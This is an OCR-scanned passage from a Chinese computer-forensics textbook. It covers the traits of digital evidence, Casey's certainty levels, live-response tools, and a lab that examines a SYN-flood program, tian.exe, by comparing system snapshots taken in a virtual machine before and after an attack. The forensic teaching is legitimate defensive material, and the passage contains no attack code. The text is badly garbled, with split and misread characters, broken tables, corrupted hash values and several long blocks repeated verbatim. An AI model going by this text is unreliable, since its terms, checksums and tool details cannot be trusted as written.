借助 计算 机 生成 的 一 切 证 据 。 相 关 的 术语 有 电子 证 据 、 网 络 证 据 、 数 字 证 据 等 。 证 据 三 要 
R: 客观 性 ,关联 性 ,合法 性 。 计 算 机 证 据 的 特性 如 下 。 

D 较 高 的 精密 性 : 以 技术 为 依托 ,很 少 受 主观 因素 的 影响 ,能 够 避免 传统 证 据 的 一 些 
弊端 ,如 证 言 的 误 传 , 书 证 的 误 记 等 。 在 没有 被 人 为 破坏 的 前 提 下 ,能够 准确 地 反映 事件 的 
过 程 和 细节 。 

© 脆弱 性 : 计算 机 信息 是 二 进 制 表示 的 ,以 数字 信号 的 方式 存在 , 且 非 连续 。 因 而 对 计算 
机 进行 的 变更 ,删除 .剪接 .监听 等 ,从 技术 上 讲 很 难 查 清 。 数 据 修改 简单 而 且 不 易 留 下 痕迹 。 

© 较 强 的 隐蔽 性 : 证 据 很 容易 被 隐藏 二进制 形式 编码 ,无 法 直接 阅读 ; 必须 借助 适 
当 的 工具 。 

@ 多 媒体 性 : 形式 多 样 ,综合 了 文本 、 图 形 、 图 像 . 动 画 、 音 频 、 视 频 等 多 媒体 信息 ,几乎 
涵盖 了 所 有 的 传统 证 据 类 型 。 

© DRE: 当 从 运行 的 计算 机 中 收集 可 疑 证 据 时 ,要 考虑 易 失 性 数据 的 等 级 。 等 级 越 
高 的 数据 被 修改 .丢失 的 可 能 性 越 大 。 如 : 存储 在 RAM 中 的 数据 可 以 显示 当前 计算 机 的 
状态 ,包括 登录 用 户 ,运行 中 的 进程 以 及 打开 的 连接 。 这 些 数据 可 以 帮助 调查 人 员 判 断 计 算 
机 入 侵 的 活动 时 间 表 。 

计算 机 证 据 和 电子 证 据 之 间 有 千 丝 万 缕 的 联系 , 却 不 尽 相 同 。 有 时 计算 机 证 据 的 外 
延 要 大 于 电子 证 据 , 因 为 以 机 械 式 计算 机 光学 计算 机 、 生 物 计 算 机 为 基础 的 证 据 只 能 从 * 功 
能 ”上 等 同 的 角度 临时 当 电子 证 据 处 理 ,显然 不 是 典型 的 计算 机 证 据 。 电 子 证 据 在 外 延 上 也 
可 能 大 于 计算 机 证 据 , 如 固定 电话 机 是 基于 模拟 电子 技术 而 制 成 的 通信 工具 , 它 所 录制 的 电 
话 资料 就 属于 电子 证 据 而 不 属于 计算 机 证 据 。 

(5) 证 据 的 可 靠 性 。 

Casey 确定 性 级 别 : C0, C1, C2, C3, C4, C5, C6。 


O Casey 确定 性 级 别 一 C0。 

描述 : 证 据 与 事实 相 矛 盾 。 

匹配 类 型 : 错误 的 /不 正确 的 。 

示例 : 检查 员 在 IE 浏览 器 上 发 现 了 漏洞 ,IE 浏览 器 允许 某 个 特定 网 站 上 的 脚本 创建 
文件 .桌面 快捷 方式 和 IE 收藏 。 嫌 疑犯 并 非 是 有 目的 地 在 系统 上 创建 了 这 些 项 目 。 

© Casey 确定 性 级 别 一 Cl 。 

描述 : 证 据 是 非常 有 疑问 的 。 

匹配 类 型 : 非常 不 确定 。 

示例 : 丢失 了 记录 文件 入 口 ,或 是 有 算 改 的 迹象 。 

© Casey 确定 性 级 别 一 C2。 

描述 : 只 有 一 个 证 据 来 源 ,没有 保护 机 制 以 防 证 据 被 算 改 。 

匹配 类 型 : 某 种 程度 的 不 确定 。 

示例 : 没有 其 他 证 据 的 电子 邮件 标题 、 系 统 日 志 。 

@ Casey 确定 性 级 别 一 C3。 

描述 : 证 据 来 源 难以 算 改 ,但 不 能 肯定 得 到 结论 。 

匹配 类 型 : 有 可 能 。 

示例 : 数据 显示 某 次 人 侵 来 自 波兰 ,但 后 来 又 有 来 自 南 韩 的 联系 。 

© Casey 确定 性 级 别 一 C4。 

描述 ; 证 据 受 到 保护 以 防 算 改 ; 证 据 未 受到 保护 以 防 算 改 ,但 多 个 独立 来 源 的 证 据 是 
一 致 的 。 

匹配 类 型 : 很 有 可 能 。 

示例 : Web 服务 器 崩溃 ,tcpwrapper 的 日 志 、Web 服务 器 日 志 数 据 都 有 显示 来 自 某 个 
公寓 。 

Casey 确定 性 级 别 一 C5 。 

描述 : 证 据 来 自 多 个 独立 来 源 ,并 且 受 到 保护 以 防 算 改 ,但 不 敢 绝 对 肯定 。 

匹配 类 型 : 几乎 是 确定 的 。 

示例 : IP 地 址 ,用户 账户 .通信 量 检测 等 都 表明 来 自 某 个 家 庭 。 

@ Casey 确定 性 级 别 一 C6。 

描述 : 证 据 是 防止 自 改 的 , 毫 无 疑问 的 。 

匹配 类 型 : 确定 的 。 

示例 : 现在 难以 想象 ,今后 可 能 存在 。 

(6) 计算 机 证 据 来 源 。 

计算 机 证 据 主 要 来 自 3 个 方面 : 计算 机 主机 系统 方面 ,网 络 ,数字 设备 。 

O 来 自主 机 系统 方面 的 证 据 : 用 户 自 建 的 文档 .用 户 保护 文档 .计算 机 创建 的 文件 .其 
他 数据 区 中 可 能 存在 的 数据 证 据 。 

© 来 自 网 络 方面 的 证 据 : 路 由 器 、 交 换 机 上 产生 的 记录 ,网 络 安全 设备 如 防火 墙 .IDS 
(人 侵 检 测 系统 ) 的 日 志 记 录 , 各 类 接 入 系统 与 网 络 应 用 有 关 的 日 志和 登录 日 志 等 。 

O 来 自 其 他 数字 设备 的 证 据 : 移动 存储 设备 ,如 U 盘 , 移 动 硬 盘 等 ; PDA、 电 子 记 事 
本 ; 微型 摄像 头 、 视 频 捕 提 卡 .掌上 电脑 ; 计算 机 附加 控制 设备 ,如 磁卡 读 卡 机 、 全 球 定位 仪 


O Casey 确定 性 级 别 一 C0。 

描述 : 证 据 与 事实 相 矛 盾 。 

匹配 类 型 : 错误 的 /不 正确 的 。 

示例 : 检查 员 在 IE 浏览 器 上 发 现 了 漏洞 ,IE 浏览 器 允许 某 个 特定 网 站 上 的 脚本 创建 
文件 .桌面 快捷 方式 和 IE 收藏 。 嫌 疑犯 并 非 是 有 目的 地 在 系统 上 创建 了 这 些 项 目 。 

© Casey 确定 性 级 别 一 Cl 。 

描述 : 证 据 是 非常 有 疑问 的 。 

匹配 类 型 : 非常 不 确定 。 

示例 : 丢失 了 记录 文件 入 口 ,或 是 有 算 改 的 迹象 。 

© Casey 确定 性 级 别 一 C2。 

描述 : 只 有 一 个 证 据 来 源 ,没有 保护 机 制 以 防 证 据 被 算 改 。 

匹配 类 型 : 某 种 程度 的 不 确定 。 

示例 : 没有 其 他 证 据 的 电子 邮件 标题 、 系 统 日 志 。 

@ Casey 确定 性 级 别 一 C3。 

描述 : 证 据 来 源 难以 算 改 ,但 不 能 肯定 得 到 结论 。 

匹配 类 型 : 有 可 能 。 

示例 : 数据 显示 某 次 人 侵 来 自 波兰 ,但 后 来 又 有 来 自 南 韩 的 联系 。 

© Casey 确定 性 级 别 一 C4。 

描述 ; 证 据 受 到 保护 以 防 算 改 ; 证 据 未 受到 保护 以 防 算 改 ,但 多 个 独立 来 源 的 证 据 是 
一 致 的 。 

匹配 类 型 : 很 有 可 能 。 

示例 : Web 服务 器 崩溃 ,tcpwrapper 的 日 志 、Web 服务 器 日 志 数 据 都 有 显示 来 自 某 个 
公寓 。 

Casey 确定 性 级 别 一 C5 。 

描述 : 证 据 来 自 多 个 独立 来 源 ,并 且 受 到 保护 以 防 算 改 ,但 不 敢 绝 对 肯定 。 

匹配 类 型 : 几乎 是 确定 的 。 

示例 : IP 地 址 ,用户 账户 .通信 量 检测 等 都 表明 来 自 某 个 家 庭 。 

@ Casey 确定 性 级 别 一 C6。 

描述 : 证 据 是 防止 自 改 的 , 毫 无 疑问 的 。 

匹配 类 型 : 确定 的 。 

示例 : 现在 难以 想象 ,今后 可 能 存在 。 

(6) 计算 机 证 据 来 源 。 

计算 机 证 据 主 要 来 自 3 个 方面 : 计算 机 主机 系统 方面 ,网 络 ,数字 设备 。 

O 来 自主 机 系统 方面 的 证 据 : 用 户 自 建 的 文档 .用 户 保护 文档 .计算 机 创建 的 文件 .其 
他 数据 区 中 可 能 存在 的 数据 证 据 。 

© 来 自 网 络 方面 的 证 据 : 路 由 器 、 交 换 机 上 产生 的 记录 ,网 络 安全 设备 如 防火 墙 .IDS 
(人 侵 检 测 系统 ) 的 日 志 记 录 , 各 类 接 入 系统 与 网 络 应 用 有 关 的 日 志和 登录 日 志 等 。 

O 来 自 其 他 数字 设备 的 证 据 : 移动 存储 设备 ,如 U 盘 , 移 动 硬 盘 等 ; PDA、 电 子 记 事 
本 ; 微型 摄像 头 、 视 频 捕 提 卡 .掌上 电脑 ; 计算 机 附加 控制 设备 ,如 磁卡 读 卡 机 、 全 球 定位 仪 


(系统 ) 。 
(7) 取证 工具 。 
取证 工具 通常 按照 取证 对 象 来 分 类 ,如 图 16-1 所 示 。 


证 据 获取 工具 


系统 证 据 获取 工具 网 络 证 据 获取 工具 

ë 防 
系 | | 数 删 | | 盘 | | 磁 | | 内 a 网 
统 | | 据 | | 存 | | 除 | | 特 | | 盘 | | 在 K 络 
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文 | | 软 | | 从 | | 在 | | 区 | |æ] | 动 IDs 动 
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具 | | 只 HITES H 
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图 16-1 取证 工具 套件 


数据 获取 和 分 析 工 具 是 计算 机 取证 工具 包 中 最 基本 、 最 重要 的 工具 。 首 先 要 验证 工具 
能 否 满足 要 求 , 即 需要 准确 地 核实 工具 的 用 途 ; 其 次 要 判定 它 的 输出 是 否 可 信 ; 然后 要 确 
定 如 何 操作 这 个 工具 。 这 种 验证 对 于 确保 计算 机 系统 内 部 信息 的 正确 提取 十 分 重要 。 

3) 开机 取证 

传统 调查 方法 是 现场 调查 人 员 直 接 关 闭 计算 机 ,然后 取得 系统 硬盘 的 按 位 镜像 ,这 种 方 
法 简单 但 不 符合 实际 ,因为 有 些 案例 不 能 通过 硬盘 镜像 找到 答案 ,例如 即时 聊天 。 很 多 案件 
中 有 价值 的 往往 是 易 失 性 数据 , 即 最 佳 的 证 据 和 信息 源 存在 于 内 存 中 ,如 网 络 连 接 、 即 时 聊 
天 客户 端 内 容 、 进 程 . 剪 贴 板 数 据 等 ,另外 关闭 系统 并 获取 硬盘 镜像 并 不 可 行 。 

开机 取证 要 求 应 对 系统 的 影响 最 小 ,要 避免 写 文件 并 且 在 获取 数据 的 时 候 越 快 越 好 , 因 
此 开机 取证 工具 一 般 采 用 命令 行 工具 (CLI)。CLI 比 图 形 界面 工具 (GUI) 有 特殊 的 优势 ， 
占用 更 小 的 内 存 , 对 内 存 的 影响 会 比较 小 ; 依赖 的 动态 链接 库 (DLLs) 更 少 ,对 系统 的 影响 
也 较 少 。 开 机 取证 收集 以 下 数据 。 

(1) 系统 时 间 : 事件 调查 过 程 中 ,首先 要 获取 的 信息 是 系统 时 间 。 系 统 时 间 为 以 后 获 
取 的 数据 信息 构建 了 时 间 上 下 文 环境 ,并 且 会 为 系统 事件 时 间 线 的 正确 分 析 提 供 帮 助 。 取 
证 工具 systime. exe。 

D 当前 登录 用 户 : 调查 过 程 中 ,有 时 需要 知道 系统 的 当前 登录 用 户 是 谁 , 包 括 本 地 登 
录用 户 ( 通 过 控制 台 或 键盘 登录 ) 和 远程 登录 用 户 ( 通 过 net use 命令 或 共享 )。 登 录用 户 为 
收集 的 其 他 系统 信息 提供 了 上 下 文 线索 ,例如 运行 进程 的 用 户 上 下 文 . 文 件 宿主 ,文件 最 后 
访问 事件 等 。 取 证 工具 Psloggedon. exe。 

(3) 打开 的 文件 : 如 果 通 过 psloggedon 找到 有 用 户 远程 登录 到 系统 中 ,那么 同时 也 要 


了 解 该 用 户 打开 了 什么 文件 。 远 程 登录 的 用 户 总 是 要 执行 一 些 命令 或 者 打开 文件 。 取 证 工 
BT. Psfile. exe, 

(4) 网 络 信息 : 和 人 侵 者 获得 访问 权限 后 ,有 时 想 要 知道 网 络 中 还 有 哪些 其 他 系统 可 以 
通过 被 入侵 的 系统 访问 。 如 果 通 过 NetBIOS 通信 和 其 他 系统 建立 了 连接 (如 共享 ) ,系统 将 
会 维护 一 个 连接 过 的 系统 名 字 列 表 ,通过 查看 缓存 的 名 字 列 表 ,调查 人 员 可 以 知道 哪些 系统 
已 经 受到 影响 。 取 证 工具 Nbtstat。 

O 网 络 连 接 : 一 旦 发 生 了 安全 事件 ,就 应 该 收集 针对 被 影响 系统 的 网 络 连接 信息 。 
随 着 时 间 的 流逝 ,连接 信息 会 慢 慢 过 期 ,时 间 越 久 , 丢 失 的 信息 越 多 。 取 证 工具 Netstat。 

(6) 进程 信息 : 通过 任务 管理 器 查看 进程 信息 时 ,可 以 看 到 每 个 进程 的 一 些 信息 ,不 
过 ,很 多 需要 收集 的 信息 并 不 能 通过 任务 管理 器 看 到 ,例如 可 执行 文件 的 全 路 径 、 启 动 进程 
时 的 命令 行 参数 信息 .进程 运行 的 时 间 、 进 程 运行 的 安全 /用 户 上 下 文 环境 、 进 程 加 载 了 哪些 
模块 .进程 的 内 存 数据 内 容 等 。 取 证 工具 Tasklist. exe、Pslist. exe 、Handle. exe, 

(7) 进程 到 端口 的 映射 : 系统 中 存在 打开 的 网 络 连 接 的 时 候 , 一 定 是 有 进程 在 使 用 这 
个 连接 , 即 每 一 个 网 络 连接 和 开放 的 端口 都 有 进程 相关 联 。 取 证 工具 Netstat。 

O 进程 内 存 : 开机 系统 会 有 一 系列 的 运行 进程 ,本 质 上 任何 一 个 进程 都 可 能 具有 恶 
意 性 。 当 系统 中 的 进程 运行 时 ,进程 名 基本 上 会 和 执行 程序 的 文件 名 一 致 。 有 人 会 用 正常 
程序 的 名 字 伪 装 。 一 旦 发 现 并 确定 了 可 疑 进程 ,调查 员 就 需要 知道 该 进程 的 更 多 信息 ,可 以 
通过 获取 进程 的 内 存 得 到 。 取 证 工具 : Lsproc、Lspd。 

(9) 网 络 状态 : 系统 中 网 卡 连接 的 状态 。 取 证 工具 : Ipconfig、Ndis. exe。 

(10) 剪贴 板 内 容 : 剪贴 板 是 暂时 存放 数据 的 内 存 区 域 ,其 中 的 数据 可 以 再 次 使 用 。 取 
证 工具 : Pclip. exe, 

(11) 服务 /驱动 信息 : 根据 注册 表 中 的 配置 ,在 系统 启动 的 时 候 服 务 和 驱动 也 会 自动 
启动 。 大 部 分 用 户 不 会 看 到 系统 中 作为 进程 运行 的 这 些 服务 ,因为 进程 中 并 没有 服务 的 明 
显 标志 ,但 服务 肯定 在 运行 。 一 些 恶意 软件 会 将 自己 安装 为 服务 ,甚至 是 系统 驱动 。 取 证 工 
具 : Svc. exe, 

(12) 命令 行 历史 : 假设 一 个 计算 机 调查 现场 ,系统 正 开 着 且 可 以 看 到 屏幕 上 有 几 个 命 
令 行 窗口 。 这 种 情况 下 ,线索 可 能 就 在 用 户 输入 的 命令 行 中 ,如 ftp 或 ping。 取 证 工具 : 
Doskey history。 

(13) 映射 的 驱动 器 : 调查 过 程 中 ,也 许 需 要 掌握 系统 中 映射 的 驱动 器 或 共享 来 自 哪 
里 。 映 射 可 能 由 用 户 创建 ,可 能 出 自 不 良 意图 。 更 进一步 ,也 许 从 文件 系统 或 注册 表 中 不 能 
发 现 这 些 映 射 的 共享 连接 信息 ,不 过 这 些 驱 动 器 映射 动态 信息 还 是 可 以 与 前 面 获取 的 网 络 
连接 信息 相关 联 。 取 证 工具 : Di. exe。 

(14) 共享 : 获取 系统 中 共享 给 网 络 的 资源 。 注 册 表 HKEY_LOCAL_MACHINE\ 
System\CurrentControlSet\Services\lanmanserver\Shares。 取 证 工具 : Share. exe, 


5. 实践 操作 及 步骤 


实践 用 恶意 代码 是 名 为 tian. exe 的 可 执行 程序 ,取证 过 程 主要 分 为 工具 准备 、 取 证 前 系 
统 信 息 采 集 和 取证 后 系统 信息 采集 ,对 取证 前 后 采集 的 系统 信息 进行 比较 分 析 , 查 找 出 
tian. exe 程序 对 系统 造成 的 变化 ,分 析出 其 恶意 行为 。 此 外 ,为 了 更 深入 地 掌握 tian. exe 的 
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行为 方式 ,作为 日 后 类 似 恶 意 程序 的 鉴定 样本 ,还 利用 专业 的 查 壳 、 脱 壳 和 逆向 分 析 工 具 对 
tian. exe 本 身 进 行 反 汇编 分 析 ,撰写 反 编 译 伪 代 码 程序 ,掌握 tian. exe 攻击 原理 和 流程 。 以 
此 为 样板 ,对 实践 10 中 的 “上 兴 木 马 ” 进 行 取证 分 析 。 取 证 对 象 如 表 16-1 所 示 。 


表 16-1 取证 对 象 
程序 名 称 tian. exe 
描述 信息 SYN 多 线程 攻击 器 
程序 标题 傲 家 攻击 器 
MD5 校 验 值 775d08eb2f3221cebe627fdf812159eb 
SHA-256 校 验 值 85f7410955675d85af8ba825cddc78d6fal0el20ced4536f2252589468c0balc 


程序 截图 


1) 实践 环境 


办 可 咒 上， 做 家 Blog: http://www rooter ful cn 


为 了 分 析 tian. exe 的 攻击 行为 ,首先 准备 一 个 测试 虚拟 操作 系统 Windows XP 
Professional 作为 tian. exe 的 运行 终端 。 

接 下 来 就 是 准备 电子 数据 采集 的 相关 工具 ,利用 这 些 工 具 对 tian. exe 程序 所 在 终端 进 
行 分 析 。 主 要 包括 tian. exe 程序 的 加 载运 行 对 系统 注册 表 文件 系统 、 活 跃进 程 和 网 络 连接 
等 的 影响 ; 利用 相关 的 查 壳 、 脱 达 和 逆向 工具 对 tian. exe 程序 本 身 进 行 分 析 , 发 掘 其 编程 过 
程 和 攻击 原理 ; 采用 相应 的 网 络 连接 .CPU 使 用 和 内 存 使 用 情况 等 分 析 工 具 来 采集 tian 
. exe 的 恶意 攻击 对 目标 系统 造成 哪些 影响 。 

(1) 桌面 虚拟 计算 机 软件 : 软件 名 称 为 VMwareWorkstation ,软件 版 本 为 7. 0. 1 build- 


227600 ,语言 为 英语 。 


(2) 虚拟 操作 系统 : 虚拟 操作 系统 为 Windows XP Professional ,详细 信息 如 下 。 


System information for \\UERVISYT — 4B8ADE: 


Uptime: 

Kernel version: 

Product type: 

Product version: 

Service pack: 

Kerne1 build number: 
Registered organization: 
Registered owner: 

IE version: 

System root: 


0 days 0 hours 21 minutes 1 second 
Microsoft Windows XP, Uniprocessor Free 
Professional 

SSI 


Processors: 
Processor speed: 
Processor type: 
Physical memory: 
Video driver: 


T 

2.1 GHz 

Intel(R) Core(TM)2 Duo CPU T6600 @ 
512 MB 

VMware SVGA II 


(3) 网 络 信息 : 虚拟 操作 系统 的 网 络 配置 如 下 。 


Windows IP Configuration 


Host Name. tui es Vervisyt— 4bBada 
Primary Dos Suffix ,s,s >t 
GT Hybrid 
IP Routing Enabled. . . . . . . . : Yes 
WINS Proxy Enabled. .......: No 
DNS Suffix Search List. ..... : localdomain 
Ethernet adapter 本 地 连接 : 
Connection - specific DNS Suffix . : localdomain 
Description. . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter 
Physical Address. . . . . . . . : 00- 0C- 29 - C4- 69 — E0 
Dhep Baablod Se es ea Yes 
Autoconfiguration Enabled . . . . : Yes 
9 
Eobnet Ne : 255.255.255.0 
Default Gateway . . . . . . . . . : 192.168.2.2 
DHCP Server + š a a ce š 192.168.2.254 
DNS Servers = kU et 192.168.2.2 
Primary WINS Server... . . . . : 192.168.2.2 
Lease Obtained. ......... : 2011 4Æ 6 H 20 日 星期 一 11:44:09 
Lease Expires... . . . . . . . : 2011 #E 6 J 20 日 星期 一 12:14:09 
2) 取证 工具 
电子 数据 采集 过 程 使 用 到 的 相关 工具 如 表 16-2 所 示 。 
表 16-2 工具 列表 
工具 名 称 功能 描述 
Date/t; time/t 获得 系统 当前 时 间 
Psinfo. exe 获取 系统 基本 信息 
Ipconfig/all 查看 系统 网 络 配置 
Regmon. exe 对 系统 注册 表 进 行 镜像 ,监督 注册 表 变 化 
Filemon. exe 对 文件 系统 变化 进行 监督 
TcpView. exe 对 网 络 连 接 进行 实时 监控 
ProcessExplorer. exe 监控 系统 活动 进程 
DPASHA. exe 执行 MD5 和 SHA-256 散 列 校 验 和 校 验 值 比较 
ExamDiff. exe 比较 两 个 文本 文件 之 间 的 不 同 
PEiD. exe 对 PE 程序 进行 加 壳 检 测 
LoadPE. exe 检测 PE 程序 的 基本 信息 ,系统 调用 .导入 表 和 资源 等 


Ollydbg. exe 


对 PE 文件 进行 跟踪 调试 


Processors: 
Processor speed: 
Processor type: 
Physical memory: 
Video driver: 


T 

2.1 GHz 

Intel(R) Core(TM)2 Duo CPU T6600 @ 
512 MB 

VMware SVGA II 


(3) 网 络 信息 : 虚拟 操作 系统 的 网 络 配置 如 下 。 


Windows IP Configuration 


Host Name. tui es Vervisyt— 4bBada 
Primary Dos Suffix ,s,s >t 
GT Hybrid 
IP Routing Enabled. . . . . . . . : Yes 
WINS Proxy Enabled. .......: No 
DNS Suffix Search List. ..... : localdomain 
Ethernet adapter 本 地 连接 : 
Connection - specific DNS Suffix . : localdomain 
Description. . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter 
Physical Address. . . . . . . . : 00- 0C- 29 - C4- 69 — E0 
Dhep Baablod Se es ea Yes 
Autoconfiguration Enabled . . . . : Yes 
9 
Eobnet Ne : 255.255.255.0 
Default Gateway . . . . . . . . . : 192.168.2.2 
DHCP Server + š a a ce š 192.168.2.254 
DNS Servers = kU et 192.168.2.2 
Primary WINS Server... . . . . : 192.168.2.2 
Lease Obtained. ......... : 2011 4Æ 6 H 20 日 星期 一 11:44:09 
Lease Expires... . . . . . . . : 2011 #E 6 J 20 日 星期 一 12:14:09 
2) 取证 工具 
电子 数据 采集 过 程 使 用 到 的 相关 工具 如 表 16-2 所 示 。 
表 16-2 工具 列表 
工具 名 称 功能 描述 
Date/t; time/t 获得 系统 当前 时 间 
Psinfo. exe 获取 系统 基本 信息 
Ipconfig/all 查看 系统 网 络 配置 
Regmon. exe 对 系统 注册 表 进 行 镜像 ,监督 注册 表 变 化 
Filemon. exe 对 文件 系统 变化 进行 监督 
TcpView. exe 对 网 络 连 接 进行 实时 监控 
ProcessExplorer. exe 监控 系统 活动 进程 
DPASHA. exe 执行 MD5 和 SHA-256 散 列 校 验 和 校 验 值 比较 
ExamDiff. exe 比较 两 个 文本 文件 之 间 的 不 同 
PEiD. exe 对 PE 程序 进行 加 壳 检 测 
LoadPE. exe 检测 PE 程序 的 基本 信息 ,系统 调用 .导入 表 和 资源 等 


Ollydbg. exe 


对 PE 文件 进行 跟踪 调试 
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3) 取证 方法 

针对 tian. exe 恶意 程序 的 取证 方法 主要 采取 镜像 对 比 的 方法 实现 。 首 先 , 在 运行 tian. exe 
程序 前 ,对 系统 的 活动 进程 ,注册 表 、 文 件 系 统 和 网 络 连 接 等 进行 采集 。 其 次 ,运行 tian. exe 
程序 并 发 送 SYN 攻击 后 ,再 对 系统 的 活动 进程 .注册 表 、 文 件 系统 和 网 络 连接 等 进行 采集 。 
最 后 ,对 两 次 采集 的 信息 进行 比较 ,发 掘 其 中 tian. exe 对 系统 造成 的 变化 。 

将 对 tian. exe 采集 的 电子 数据 集 分 成 三 类 系统 基本 信息 、 取 证 前 镜像 和 取证 后 镜像 。 
同时 对 每 个 生成 的 镜像 文件 进行 MD5 和 SHA-256 校 验 ,作为 以 后 镜像 文件 是 否 发 生变 化 
的 依据 。 镜 像 文件 的 具体 描述 如 下 。 

(1) 系统 基本 信息 如 表 16-3 所 示 。 


表 16-3 系统 基本 配置 表 


文件 名 称 文件 描述 MD5 &SHA-256 校 验 值 
51118abb838f53d0193f86a9cf5a77cb 
Sysinfo. txt 系统 基本 配置 信息 96b80abfc353854f0ae828e3fb977e5bb101d1b 


064d8a2b9102648b1686bae97 
fd0885b7da3f95fel10f82f163040879 
Netconfig. txt 网 络 基 本 配置 信息 4a1995d025f8bff277ee6laca836a88d6e49e14 
d2e0eb663f3a906bf982aa77a 


(2) 取证 前 镜像 如 表 16-4 所 示 。 
表 16-4 ”取证 前 系统 镜像 表 


文件 名 称 文件 描述 MD5 &SHA-256 校 验 值 
59e7cf03f235f99ba791dde93cb0702f 
time. txt 镜像 开始 时 间 fa9945ff5b3f661427fd42eel6e13bc3b727c2051a 


9e1f3e78008178a0c2361c 
2f0b6c10879f9252175a4fc23ee2ce6f 


processinfo. TXT 活动 进程 信息 7307105b49dd1460544c9c43d857bl3dccb33da399 
e29475a906a9b24941adbf 
bb31106cf2215f44a9b4d9e3c4c2a89a 

filemon. LOG 文件 系统 变化 信息 51978846b252d467804543c618b36d7e2d962575d6 
4845bd65fb03f26d088487 
8036fee05f34bda5888d165226e8776d 

reginfo. LOG 注册 表 变 化 信息 aa327alc35bedc5f154bdc558ed3158b5d269c8d6f9 
82d6a38079417ec714f86 
5271e56d115ba534535601bfd7e389cd 


netinfo. txt 网 络 连接 信息 06bf5360822f67146a0calb120bc0dad0fdda0f3eb53 
da6f7c0d704838a47e18 
775d08eb2f3221cebe627fdf812159eb 

tian. exe 待 测 恶意 程序 85f7410955675d85af8ba825cddc78d6fal0e120ced4 


536f2252589468c0balc 


(3) 取证 后 镜像 如 表 16-5 所 示 。 


表 16-5 取证 后 系统 镜像 表 


文件 名 称 文件 描述 MD5 &SHA-256 校 验 值 


2a444160c2f0c4445979447a858e36e0 


time_start. txt etd 始 时 间 ( 程 序 运行 ce270da31a2ce579321ae9fa5208a8f39a49813e458 
99818d5ddc077cc9ea503 
== 441177478e07437f968c6eeeced0f500 
time_end. txt AO ARAM (程序 运行 blc905bd58087ffd9cdc25a4888089fbd5852de82525 


440flce90fd5adb9a353 


954430874ba21d6f3b177f27aa572d06 


processinfo-m. TXT | 活动 进程 信息 (未 攻击 ) | 635e2744ca269flc6eb4f6994be32bdb8eda2c362a9e 


e9cadc7c171a2f687af4 


51c32377e83ed34c0df774ddc4181c5b 


processinfo-h. TXT | 活动 进程 信息 (已 攻击 ) | 31a5f5d8f98d9149cda8al2e2e4bdb7d2e24e951aeel4 
c09684773b281b53e64 
309a7dccf2f2a2e79f2dcc155d224428 
filemon. LOG 文件 系统 变化 信息 4723a78637e876b75cb694fef47b6ff66ca9e16654f4ec4 
f3e9887ae0afe67d2 
4bee8098d13840502471eeb959569e9e 
reginfo. LOG 注册 表 变化 信息 16a5d3991516cl5ce2887416bab12a9444b1600f5f925b 
9178d29c06dee26038 
f3074138b31fdcd0e7b784dab8789elb 
netinfo. txt 网 络 连接 信息 87bdb35d5ald9b6137cce762ad9dade15001ac58cdddd 
67ea3e479f319202536 
775d08eb2f3221cebe627fdf812159eb 
tian. exe 待 测 恶意 程序 85f7410955675d85af8ba825cddc78d6fal0el20ced4 
536f2252589468c0balc 
4) 行为 分 析 
取证 对 象 是 名 为 tian. exe 的 可 执行 程序 ,其 基本 信息 如 下 。 
程序 标题 : 做 家 攻击 器 
程序 名 称 : tian. exe 
产品 说 明 : SYN 多 线程 攻击 
产品 版 本 : 1.0.0.0 
产品 名 称 : synbomb 
内 部 名 称 : Bomb 
源 文件 名 : Bomb. exe 
语言 : 中 文 
编程 环境 : Microsoft Visual C++ 6.0 


行为 分 析 方法 主要 是 借助 相应 的 监控 工具 ,对 待 测 程序 的 行为 进行 监控 ,以 便 发 现 其 恶 
意 轨迹 。 同 时 ,将 分 析 结果 保存 在 相应 的 镜像 文件 里 ,并 对 镜像 文件 进行 MD5 和 SHA-256 


校 验 ,作为 司 


过 程 如 图 16- 
在 图 16- 


法 提 呈 鉴定 的 依据 。tian. exe 程序 实现 攻击 方式 是 SYN 多 线程 攻击 ,其 攻击 
2 所 示 。 
2 中 , 设 定 攻击 IP 地 址 为 119. 75. 217. 56 ,攻击 端口 为 80 。 攻 击 源 IP 为 本 机 地 
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贺 吕 咒 了。 做 家 了 eg: http://www rooter ful. cn 


图 16-2 tian. exe 的 SYN 攻击 中 截图 


HE 192. 168. 2. 129 ,使 用 端口 为 默认 值 55555 。 设 置 完毕 后 tian. exe 向 目标 IP 地 址 发 送 大 
量 的 SYN 数据 包 。 

(1) 分 析 时 间 。 

在 对 tian. exe 程序 的 恶意 行为 进行 分 析 时 ,首要 的 工作 就 是 记录 分 析 开 始 时 间 和 最 后 
分 析 结 束 时 间 。 时 间 在 恶意 程序 的 取证 分 析 过 程 中 是 比较 重要 的 , 它 也 是 保证 取证 分 析 过 
程 的 真实 性 、 准 确 性 和 完整 性 的 必要 因素 。 例 如 ， 

分 析 开 始 时 间 : 2011-06-20 星期 一 11:40 

分 析 结 束 时 间 : 2011-06-20 ”星期 一 12:07 

(2) 活动 进程 监控 。 

使 用 ProcessExplorer. exe 程序 对 系统 中 当前 的 活动 进程 进行 监控 ,可 以 帮助 分 析 人 员 
查找 出 可 疑 程序 。 在 这 里 ,只 用 到 了 其 进程 名 .PID、CPU 使 用 、 内 存 占 用 、 运 行 账户 、 启 动 线 
程 数 和 镜像 路 径 等 列 项 来 对 tian. exe 进程 进行 分 析 , 如 图 16-3 所 示 。 


Thr... | Path 


Process FD 
Fa 


Private Bytes Uzer Nane ~ 
K 


CPU 
1.56 


19 C: \WINDOVS\systen32\Wwinlogon. exe 
S C; WINDOWS A =y=t en32\hen\ niprvse. exe 


图 16-3 tian. exe 运行 并 未 发 动 SYN 攻击 时 系统 活动 进程 列表 


从 图 16-3 中 可 知 ,tian. exe 程序 的 PID 为 548,CPU 使 用 为 0% ,占用 内 存量 为 1364KB, 启 
动 线程 数 为 1 ,镜像 地 址 为 C:\ 数 据 分 析 \tian. exe. 

图 16-4 是 在 tian. exe 发 动 SYN 攻击 时 测试 系统 当前 的 活动 进程 表 。 可 以 看 出 ,tian. 
exe 的 PID 为 548,CPU 使 用 为 100% ,内存 使 用 量 为 1648KB、 启 动 线程 数 为 2, 镜 像 地 址 为 
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贺 吕 咒 了。 做 家 了 eg: http://www rooter ful. cn 


图 16-2 tian. exe 的 SYN 攻击 中 截图 


HE 192. 168. 2. 129 ,使 用 端口 为 默认 值 55555 。 设 置 完毕 后 tian. exe 向 目标 IP 地 址 发 送 大 
量 的 SYN 数据 包 。 

(1) 分 析 时 间 。 

